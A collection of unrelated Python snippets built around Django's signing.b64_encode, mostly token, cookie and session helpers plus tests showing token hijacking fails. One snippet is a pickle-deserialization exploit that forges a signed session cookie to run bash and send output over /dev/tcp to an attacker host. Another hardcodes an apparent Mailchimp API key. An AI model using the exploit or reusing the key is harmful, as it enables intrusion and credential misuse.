def get(self, request): try: tk = request.GET.get('gtk') if tk != '5c9bad6ae8d8431eb3148d92f4b042e1': return JsonResponse({"Error": 'false', 'Msg': '校验错误, 请传入正确参数'}, safe=False) else: req = Token.objects.get(id=1).token ponged = signing.b64_encode(req.encode()).decode() query_data = signing.b64_encode(ponged.encode()).decode() return JsonResponse({"statue": 'success', 'data': query_data}, safe=False) except Exception as e: return JsonResponse({"statue": 'false', 'msg': str(e)}, safe=False) # '''校验token''' # Y21GbGFXRnNabXBrYTNOc1ptRnFaSE5yYkdacQ # def post(self, request): # try: # # tk = request.META['TOKEN'] # tk = request.POST.get('TOKEN') # src = signing.b64_decode(tk.encode()).decode() # dat = signing.b64_decode(src.encode()).decode() # # print(dat) # stk = Token.objects.get(id=1).token # # print(stk) # if dat != stk: # return JsonResponse({"Error": 'false', 'Msg': False}, safe=False) # else: # return JsonResponse({"Error": 'success', 'Msg': True}, safe=False) # except Exception as e: # return JsonResponse({"statue": 'false', 'msg': e}, safe=False)
def set_express_session(resp, session_dict, cookie_name='express_sess'): """ Set express session cookie that express can parse. nearly got it. but django adds quotes around the cookie value. will have to fix in express. """ key = settings.SECRET_KEY cookie_value = base64.b64encode( unicode(json.dumps(session_dict, separators=(',', ':')))) cookie = cookie_name + '=' + cookie_value hmac = Hmac.new(key, cookie, hashlib.sha1) cookie_sig = signing.b64_encode(hmac.digest()) resp.set_cookie(cookie_name, value=cookie_value, max_age=None, expires=None, secure=None, httponly=True) resp.set_cookie(cookie_name + '.sig', value=cookie_sig, max_age=None, expires=None, secure=None, httponly=True)
def get_express_session(req, cookie_name='express_sess'): """ get the Express.js session dict. default session cookie name of express:sess does now work with django. """ key = settings.SECRET_KEY cookie_value = req.COOKIES.get(cookie_name) cookie_sig = req.COOKIES.get(cookie_name + '.sig') if not cookie_value or not cookie_sig: return {} cookie = cookie_name + '=' + cookie_value hmac = Hmac.new(key, cookie, hashlib.sha1) digest = signing.b64_encode(hmac.digest()) valid_sig = crypto.constant_time_compare(digest, cookie_sig) if not valid_sig: return {} try: json_data = signing.b64_decode(cookie_value) session = json.loads(json_data) except: return {} return session
def sign(self, data): """ Create an URL-safe, signed token from ``data``. """ data = signing.b64_encode(data).decode() return self.signer.sign(data)
def test_naive_token_hijacking_fails(self): # The revocation key may be identical for two users: # - if SESAME_INVALIDATE_ON_PASSWORD_CHANGE is False or if they don't # have a password; # - if SESAME_ONE_TIME is False or if they have the same last_login. # In that case, could one user could impersonate the other? user1 = self.user user2 = self.create_user("jane") token1 = create_token(user1) token2 = create_token(user2) # Check that the test scenario produces identical revocation keys. # This test depends on the implementation of django.core.signing; # however, the format of tokens must be stable to keep them valid. data1, sig1 = token1.split(":", 1) data2, sig2 = token2.split(":", 1) data1 = signing.b64_decode(data1.encode()) data2 = signing.b64_decode(data2.encode()) pk1 = packers.packer.pack_pk(user1.pk) pk2 = packers.packer.pack_pk(user2.pk) self.assertEqual(data1[: len(pk1)], pk1) self.assertEqual(data2[: len(pk2)], pk2) key1 = data1[len(pk1) :] key2 = data2[len(pk2) :] self.assertEqual(key1, key2) # Check that changing just the primary key doesn't allow hijacking the # other user's account. data = pk2 + key1 data = signing.b64_encode(data).decode() token = data + sig1 user = parse_token(token, self.get_user) self.assertIsNone(user) self.assertLogsContain("Bad token")
def dumps(obj, key=None, salt='django.core.signing', serializer=JSONSerializer, compress=False): """ Returns URL-safe, sha1 signed base64 compressed JSON string. If key is None, settings.SECRET_KEY is used instead. If compress is True (not the default) checks if compressing using zlib can save some space. Prepends a '.' to signify compression. This is included in the signature, to protect against zip bombs. Salt can be used to namespace the hash, so that a signed string is only valid for a given namespace. Leaving this at the default value or re-using a salt value across different parts of your application without good cause is a security risk. The serializer is expected to return a bytestring. """ data = serializer().dumps(obj) # Flag for if it's been compressed or not is_compressed = False if compress: # Avoid zlib dependency unless compress is being used compressed = zlib.compress(data) if len(compressed) < (len(data) - 1): data = compressed is_compressed = True base64d = b64_encode(data) if is_compressed: base64d = b'.' + base64d return TimestampSigner(key, salt=salt).sign(base64d)
def sign(self, data): """ Create an URL-safe, signed token from `data`. """ data = signing.b64_encode(data).decode() return self.signer.sign(data)
def dumps(obj, key=None, salt='django.core.signing', serializer=JSONSerializer, compress=False): """ Returns URL-safe, sha1 signed base64 compressed JSON string. If key is None, settings.CRYPTOGRAPHY_SIGNINGKEY is used instead. If compress is True (not the default) checks if compressing using zlib can save some space. Prepends a '.' to signify compression. This is included in the signature, to protect against zip bombs. Salt can be used to namespace the hash, so that a signed string is only valid for a given namespace. Leaving this at the default value or re-using a salt value across different parts of your application without good cause is a security risk. The serializer is expected to return a bytestring. """ data = serializer().dumps(obj) # Flag for if it's been compressed or not is_compressed = False if compress: # Avoid zlib dependency unless compress is being used compressed = zlib.compress(data) if len(compressed) < (len(data) - 1): data = compressed is_compressed = True base64d = b64_encode(data) if is_compressed: base64d = b'.' + base64d return TimestampSigner(key, salt=salt).sign(base64d)
def generate_token(self): # Inspired by: https://github.com/aaugustin/django-sesame/ raw_token = struct.pack( str("!i"), self.invited_user.pk) + crypto.pbkdf2( self.invited_user.email, "radiologo", 10000) url_ready_token = signing.TimestampSigner(salt="radiologo").sign( signing.b64_encode(raw_token).decode()) self.sent_token = url_ready_token return url_ready_token
def serialize_and_sign(payload, salt, compress=False): data = signing.JSONSerializer().dumps(payload) prefix = "" if compress: compressed = zlib.compress(data, 9) if len(compressed) < (len(data) - 1): # Only use the compressed version if it's actually smaller data = compressed prefix = "." encoded = prefix + signing.b64_encode(data) return signing.Signer(None, salt=salt).sign(encoded)
def _get_val(): token = get_token(request) if token is None: # In order to be able to provide debugging info in the # case of misconfiguration, we use a sentinel value # instead of returning an empty dict. return 'NOTPROVIDED' else: token = force_bytes(token, encoding='latin-1') key = force_bytes(get_random_string(len(token)), encoding='latin-1') value = b64_encode(xor(token, key)) return force_text(b'$'.join((key, value)), encoding='latin-1')
def token_encode(content_type_id, object_id): """ Encodes the content_type_id and object_id values into a packed string. """ data = struct.pack('!QQ', content_type_id, object_id) # Set content_type_id and object_id content_type_id = data[:8].lstrip('\0') object_id = data[8:].lstrip('\0') # Set the size of our values size = struct.pack('!B', len(content_type_id) << 4 | len(object_id)) return b64_encode(size + content_type_id + object_id)
def set_express_session(resp, session_dict, cookie_name='express_sess'): """ Set express session cookie that express can parse. nearly got it. but django adds quotes around the cookie value. will have to fix in express. """ key = settings.SECRET_KEY cookie_value = base64.b64encode(unicode(json.dumps(session_dict, separators=(',', ':')))) cookie = cookie_name + '=' + cookie_value hmac = Hmac.new(key, cookie, hashlib.sha1) cookie_sig = signing.b64_encode(hmac.digest()) resp.set_cookie(cookie_name, value=cookie_value, max_age=None, expires=None, secure=None, httponly=True) resp.set_cookie(cookie_name + '.sig', value=cookie_sig, max_age=None, expires=None, secure=None, httponly=True)
def _get_val(): token = get_token(request) if token is None: # In order to be able to provide debugging info in the # case of misconfiguration, we use a sentinel value # instead of returning an empty dict. return 'NOTPROVIDED' else: token = force_bytes(token, encoding='latin-1') key = force_bytes( get_random_string(len(token)), encoding='latin-1' ) value = b64_encode(xor(token, key)) return force_text(b'$'.join((key, value)), encoding='latin-1')
def new_temporary_file(filename, mimetype, prefix=''): dir = secure_join(settings.MEDIA_ROOT, 'temporary') if not os.path.exists(dir): os.makedirs(dir) f = NamedTemporaryFile( mode='wb', prefix=prefix, suffix=os.path.splitext(filename)[1], delete=False, dir=dir) CleanupTemporary().apply_async((f.name,), countdown=TEMPORARY_FILE_TTL) signer = TimestampSigner(sep=':') url = reverse('filesystem-temporary-download', kwargs={ 'token': signer.sign(b64_encode('%s,%s,%s' % (os.path.basename(f.name), filename, mimetype))), 'filename': filename, }) return f, url
def new_temporary_file(filename, mimetype, prefix=''): dir = secure_join(settings.MEDIA_ROOT, 'temporary') if not os.path.exists(dir): os.makedirs(dir) f = NamedTemporaryFile( mode='wb', prefix=prefix, suffix=os.path.splitext(filename)[1], delete=False, dir=dir) CleanupTemporary().apply_async((f.name,), countdown=TEMPORARY_FILE_TTL) signer = TimestampSigner(sep=':') url = reverse('filesystem-temporary-download', kwargs={ 'token': signer.sign( b64_encode('%s,%s,%s' % ( os.path.basename(f.name), filename, mimetype))), 'filename': filename, }) return f, url
def test_naive_token_hijacking_fails(self): # Tokens contain the PK of the user, the hash of the revocation key, # and a signature. The revocation key may be identical for two users: # - if SESAME_INVALIDATE_ON_PASSWORD_CHANGE is False or if they don't # have a password; # - if SESAME_ONE_TIME is False or if they have the same last_login. User = get_user_model() last_login = timezone.now() - datetime.timedelta(3600) user_1 = User.objects.create(username="******", last_login=last_login,) user_2 = User.objects.create(username="******", last_login=last_login,) token1 = self.backend.create_token(user_1) token2 = self.backend.create_token(user_2) self.backend.unsign(token1) self.backend.unsign(token2) # Check that the test scenario produces identical revocation keys. # This test depends on the implementation of django.core.signing; # however, the format of tokens must be stable to keep them valid. data1, sig1 = token1.split(self.backend.signer.sep, 1) data2, sig2 = token2.split(self.backend.signer.sep, 1) bin_data1 = signing.b64_decode(data1.encode()) bin_data2 = signing.b64_decode(data2.encode()) pk1 = self.backend.packer.pack_pk(user_1.pk) pk2 = self.backend.packer.pack_pk(user_2.pk) self.assertEqual(bin_data1[: len(pk1)], pk1) self.assertEqual(bin_data2[: len(pk2)], pk2) key1 = bin_data1[len(pk1) :] key2 = bin_data2[len(pk2) :] self.assertEqual(key1, key2) # Check that changing just the PK doesn't allow hijacking the other # user's account -- because the PK is included in the signature. bin_data = pk2 + key1 data = signing.b64_encode(bin_data).decode() token = data + sig1 user = self.backend.parse_token(token) self.assertEqual(user, None) self.assertIn("Bad token", self.get_log())
def register_user_mailchimp(list_id, email, resort_name, first_name, last_name, interest_list): http = urllib3.PoolManager() url = 'https://us3.api.mailchimp.com/3.0/lists/%s/members' % list_id data = { "email_address": email, "status": "pending", "email_type": "html", "merge_fields": { "FNAME": first_name, "LNAME": last_name, "RESORT": resort_name }, "interests": {key: True for key in interest_list} } headers = { "Authorization": "Basic %s" % b64_encode("duncan:bf9fa3e09972580b286d55ed5edd6a02-us3"), "Content-Type": "application/json" } r = http.request('POST', url, headers=headers, body=json.dumps(data))
def jia_mi(self, cls): #加密 value = signing.dumps(cls, key=self.KEY, salt=self.SALT) mima = signing.b64_encode(value.encode()).decode() return mima
def test_bogus(self): t = b64_encode(b"random") resp = self.client.get("/admin/", HTTP_X_AUTH_TOKEN=t) self.assertRedirects(resp, "/admin/login/?next=/admin/")
def base64_hmac(salt, value, key): return b64_encode(salted_hmac(salt, value, key).finalize())
def dumps(self, obj): data = json.dumps(obj, separators=(',', ':'), sort_keys=True).encode('utf-8') base64d = signing.b64_encode(data) return signing.Signer(salt=self.salt).sign(base64d)
def test_get_verification_code(self): signer = TimestampSigner() code = b64_encode(bytes(signer.sign(TEST_EMAIL), encoding='utf-8')) nt.assert_equal(self.user.get_verification_code(TEST_EMAIL), code)
def encrypt(obj): """加密""" value = signing.dumps(obj, key=KEY, salt=SALT) value = signing.b64_encode(value.encode()).decode() return value
def my_encode_token(pk, role, password): # id+空格+role+空格+password+空格+时间进行加密 return signing.b64_encode((str(pk) + " " + str(role) + " " + password + " " + str(time.time())).encode()).decode()
def encrypt(obj): """加密""" value = signing.dumps(obj, key='liming', salt='www.gongliming.com') value = signing.b64_encode(value.encode()).decode() return value
def encrypt(obj): """加密""" enStr = signing.dumps(obj, key=KEY, salt=SALT) enStr64 = signing.b64_encode(enStr.encode()).decode() # print(enStr64) return enStr64
def Encrypt(value): data = signing.dumps(value) data = signing.b64_encode(data.encode()).decode() return data
def create_crypted_challenge(): challenge = get_random_string(CAPTCHA_LENGTH, CAPTCHA_CHARS) return b64_encode(crypto_data.encrypt(challenge, CAPTCHA_AGE))
def get_verification_code(self, email): # verification token signer = TimestampSigner() return b64_encode(bytes(signer.sign(email), encoding='utf-8'))
def my_encode(value): return signing.b64_encode(value.encode()).decode()
def enqueue(request, task, *args, **kwargs): status = task.delay(*args, **kwargs) signer = TimestampSigner(key=request.session.session_key, sep=':') return signer.sign(b64_encode(status.id))
def enqueue(request, task, *args, **kwargs): result = task.delay(language=get_language(), *args, **kwargs) signer = TimestampSigner(key=request.session.session_key, sep=':') return signer.sign(b64_encode(result.id))
def dumps(self, obj): data = json.dumps( obj, separators=(',', ':'), sort_keys=True).encode('utf-8') base64d = signing.b64_encode(data) return signing.Signer(salt=self.salt).sign(base64d)
def encrypt(obj): value=signing.dumps(obj,key=settings.key,salt=settings.salt) value=signing.b64_encode(value.encode()).decode() return value
def encrypt(self, obj): value = signing.dumps(obj, key=self.KEY, salt=self.SALT) value = signing.b64_encode(value.encode()).decode() return value
djpath = filter(lambda x:"PWD" == x[:3], environ.split("\x00"))[0].split("=")[1] appname = djpath[djpath.rindex("/")+1:] djbsettings = readfile(djpath + "/" + appname + "/settings.py") #LOL YES I KNOW, but I wrote the code and I know it doesn't do malicious things here exec(filter(lambda x:"SECRET_KEY" in x, djbsettings.split("\n"))[0]) exec(filter(lambda x:"SESSION_ENGINE" in x, djbsettings.split("\n"))[0]) import django.core.signing as d s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) port = random.randint(9000,65000) s.bind(('0.0.0.0',port)) print "listening on %d"%port s.listen(5) pdata = "cos\nsystem\n(S'%s'\ntR." % (" bash -c 'cd /home/reekee/; ./give_me_the_flag.exe > /dev/tcp/%s/%d' "%(MYIP,port)) t = d.TimestampSigner(SECRET_KEY, salt=SESSION_ENGINE).sign(d.b64_encode(pdata)) print t br = mechanize.Browser() br.open(HOST) br.set_cookie("sessionid="+t+";") try: br.open(HOST) except: pass client, addr = s.accept() print addr print client.recv(1024)
def encrypt(rvalue): value = signing.dumps(rvalue, key=KEY, salt=SALT) value = signing.b64_encode(value.encode()).decode() return value
def encrypt(obj): """加密""" # salt给生成的签名加盐,进行解码的时候使用 value = signing.dumps(obj, key=KEY, salt=SALT) value = signing.b64_encode(value.encode()).decode() return value
def _sign(obj): json = signing.JSONSerializer().dumps(obj) data = signing.b64_encode(json) return _signer.sign(data)